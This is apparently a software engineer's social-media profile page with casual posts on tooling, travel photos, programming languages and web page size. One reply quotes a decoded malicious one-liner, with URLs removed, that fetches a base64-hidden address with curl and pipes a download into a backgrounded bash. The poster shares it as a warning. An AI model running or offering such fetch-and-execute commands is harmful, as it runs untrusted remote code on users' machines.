Will Richardson

183 Followers
145 Following
1.3K Posts

Software engineer, photographer, and general computer enthusiast. World's best tmux programmer.

🇳🇿🇦🇺

Currently working at Google Sydney. Personal opinions only.

Bloghttps://willhbr.net
Photoshttps://photography.willhbr.net
Pronounshe/him
A #githubfail for @wezm—if you've turned off PRs for a repo, when you get a dependabot notification it just 404s, since it can't open a PR. There's a perfectly good security tab it could link to.
And here's the plains from the plane
And here's leaving #Sydney (#shotoniphone)
Here's the view flying in to #Christchurch #Otautahi this arvo
@marcoarment does this mean that if you want to see the status of one, you have to use remote desktop, or is there a dashboard for the job scheduler that shows that info as well?
if you wanted to install your own apps on your phone, you should have bought a phone that wasn't one of the only two phone types allowed to exist! it's a free market, baby!
hey remember when cloudflare published a fake matrix implementation and claimed it was production grade? that was fun

New blog post!

I've been investigating out how various languages get away with not requiring semicolons.

I looked at 11 languages and found so many interesting cases I had to share!

https://terts.dev/blog/no-semicolons-needed/

#programming #roto

No Semicolons Needed | Terts Diepraam

@decryption for anyone else following along at home, this is what it decodes to (with URLs removed b/c you shouldn't click 'em)

curl -sL "$(echo 'base64 encoded URL/some unique id' | base64 -d)" & curl -sL "
(echo 'some static base64 URL.php')" | nohup bash &

@pointlessone I guess you _could_ have some IPC system that would allow sharing one browser process between apps, but maybe I've just invented ChromeOS.

Static web pages _can_ be tiny (if I removed web fonts my site would be <10kB) but basically no one cares about optimising for size this much (even me, given I serve 90kB of fonts)